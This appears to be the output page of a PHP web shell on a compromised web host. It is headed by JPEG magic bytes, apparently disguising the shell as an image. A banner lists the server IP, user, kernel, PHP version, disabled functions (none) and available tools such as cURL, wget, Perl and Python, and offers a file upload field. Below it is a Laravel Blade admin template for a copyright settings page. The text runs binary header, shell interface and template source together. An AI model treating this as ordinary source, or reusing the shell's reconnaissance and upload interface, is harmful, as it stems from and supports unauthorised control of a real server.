����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.16.44.178 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/gle.gltechlimited.com/resources/views/admin/ |
Upload File : |
@extends('layouts.master') @section('title',__('Copyright')) @section('breadcum') <div class="breadcrumbbar"> <h4 class="page-title">{{ __('Copyright') }}</h4> <div class="breadcrumb-list"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="{{url('/admin')}}" title="{{ __('Dashboard') }}">{{ __('Dashboard') }}</a></li> <li class="breadcrumb-item active" aria-current="page">{{ __('Copyright') }}</li> </ol> </div> </div> @endsection @section('maincontent') <div class="contentbar"> <div class="row"> <div class="col-md-12"> <div class="card m-b-50"> <div class="card-header"> <h5 class="card-title">{{ __('Copyright') }}</h5> </div> <div class="card-body"> @if ($config) {!! Form::model($config, ['method' => 'PATCH', 'route' => 'copyright']) !!} <div class="form-group{{ $errors->has('copyright') ? ' has-error' : '' }}"> {!! Form::textarea('copyright', null, ['id' => 'editor1', 'class' => 'form-control']) !!} <small class="text-danger">{{ $errors->first('copyright') }}</small> </div> <div class="btn-group pull-left"> <button type="submit" class="btn btn-primary-rgba"><i class="fa fa-check-circle mr-1"></i> {{__('Save')}}</button> </div> <div class="clear-both"></div> {!! Form::close() !!} @endif </div> </div> </div> </div> </div> </div> @endsection @section('script') <script> $(function () { CKEDITOR.replace('editor1'); }); </script> @endsection